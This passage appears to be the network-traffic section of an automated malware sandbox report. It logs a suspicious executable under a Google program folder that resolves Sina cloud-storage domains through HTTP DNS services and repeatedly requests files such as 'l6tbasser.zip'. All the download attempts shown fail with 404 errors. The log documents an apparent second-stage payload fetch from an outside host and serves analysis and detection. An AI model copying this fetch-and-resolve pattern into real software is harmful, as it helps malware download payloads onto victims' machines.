                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 64 63 39 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 35 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32a9dc93-2412-0521-2705-b4055d752a1d</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                83192.168.2.550026182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:06.062565088 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:07.649446011 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                84192.168.2.550027119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:06.062864065 CET81OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:07.295473099 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                85192.168.2.550028114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:06.063364983 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                86192.168.2.550030183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:07.423237085 CET238OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:08.964220047 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:08 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 765b542c-2412-0521-2708-5ca7213e0802
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 35 62 35 34 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 38 2d 35 63 61 37 32 31 33 65 30 38 30 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>765b542c-2412-0521-2708-5ca7213e0802</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                87192.168.2.55003527.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:09.095890999 CET236OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:10.935267925 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:01 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b7fff-2412-0521-2710-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 37 66 66 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>769b7fff-2412-0521-2710-5ca7213e02f2</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                88192.168.2.55004027.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:11.155288935 CET236OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:12.934119940 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:10 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32ee3085-2412-0521-2712-b4055d752c2c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 65 65 33 30 38 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 32 2d 62 34 30 35 35 64 37 35 32 63 32 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32ee3085-2412-0521-2712-b4055d752c2c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                89192.168.2.550047119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:13.064100981 CET79OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:14.318424940 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                90192.168.2.550046182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:13.064102888 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:14.664510012 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                91192.168.2.550048114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:13.071764946 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                92192.168.2.55005227.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:14.443644047 CET236OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:16.259028912 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:13 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3566e00a-2412-0521-2715-6c92bfce68e1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 65 30 30 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 35 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566e00a-2412-0521-2715-6c92bfce68e1</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                93192.168.2.55005627.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:16.386384010 CET236OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:18.197642088 CET504INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:09 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32da3749-2412-0521-2717-b4055d752cc6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 33 37 34 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32da3749-2412-0521-2717-b4055d752cc6</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                94192.168.2.550061123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:18.322895050 CET243OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:19.897171021 CET533INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:19 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f12e6c-2412-0521-2719-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 31 32 65 36 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 39 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>34f12e6c-2412-0521-2719-6c92bfce66de</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                95192.168.2.550067114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:20.026598930 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                96192.168.2.550068182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:20.027196884 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:21.593816042 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                97192.168.2.550069119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:20.029937983 CET81OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:21.254275084 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                98192.168.2.550073183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:21.416002035 CET243OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:22.952295065 CET533INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7470899e-2412-0521-2722-047bcb4b71b0
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 37 30 38 39 39 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 32 2d 30 34 37 62 63 62 34 62 37 31 62 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>7470899e-2412-0521-2722-047bcb4b71b0</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                99192.168.2.550078183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:23.078197002 CET242OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:24.623226881 CET533INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:24 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 74171eea-2412-0521-2724-0894eff93518
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 37 31 65 65 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 34 2d 30 38 39 34 65 66 66 39 33 35 31 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74171eea-2412-0521-2724-0894eff93518</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                100192.168.2.550082114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:25.015767097 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                101192.168.2.550083119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:25.021914005 CET80OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:26.245949030 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                102192.168.2.550084182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:25.101630926 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:26.661813974 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                103192.168.2.55008549.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:26.369856119 CET242OUTGET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:27.945915937 CET533INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:27 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 345d03c2-2412-0521-2727-0894eff93894
                                                                                x-error-code: NoSuchBucket
